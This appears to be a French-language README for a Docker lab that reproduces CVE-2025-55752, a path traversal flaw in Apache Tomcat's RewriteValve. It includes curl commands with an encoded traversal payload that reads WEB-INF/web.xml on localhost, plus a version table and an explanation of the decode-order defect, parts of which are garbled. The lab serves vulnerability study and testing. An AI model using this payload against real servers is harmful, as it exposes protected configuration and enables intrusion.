
# Environnement de reproduction basé sur Docker pour CVE-2025-55752, une vulnérabilité de traversée de chemin dans RewriteValve d'Apache Tomcat, démontrant le défaut de normalisation avant décodage et fournissant des commandes de test.
Environnement de reproduction basé sur Docker pour CVE-2025-55752, une vulnérabilité de traversée de chemin dans Apache Tomcat 10.1.44.
CVE-2025-55752 est une vulnérabilité de traversée de chemin dans le RewriteValve d'Apache Tomcat causée par un traitement incorrect
de l'ordre : la normalisation de l'URL se produit avant le décodage de l'URL. Cela permet aux attaquants de contourner les contraintes de sécurité
protégeant des répertoires comme /WEB-INF/ à l'aide de séquences de traversée de chemin encodées dans l'URL (..%2f).
| Série | Versions vulnérables | Version corrigée |
|---|---|---|
| 11.x | 11.0.0-M1 à 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 à 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 à 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 à 8.5.100 | EOL - Aucun correctif |
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
curl -I 'http://localhost:8080/WEB-INF/web.xml'
Résultat attendu : 403 Forbidden
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
Résultat attendu : 200 OK + contenu de web.xml (vulnérabilité confirmée)
/download?path=..%2fWEB-INF%2fweb.xml/files/..%2fWEB-INF%2fweb.xml%2f non reconnu comme /, .. survit%2f → / → /files/../WEB-INF/web.xml/WEB-INF/web.xmlCorrect : Décoder → Normaliser → Contrôle de sécurité
Vulnérable : Normaliser → Décoder → Contrôle de sécurité ✗
../ et %2e%2e⚠️ AVERTISSEMENT : Ne pas déployer en production. Utiliser uniquement dans des environnements de test isolés.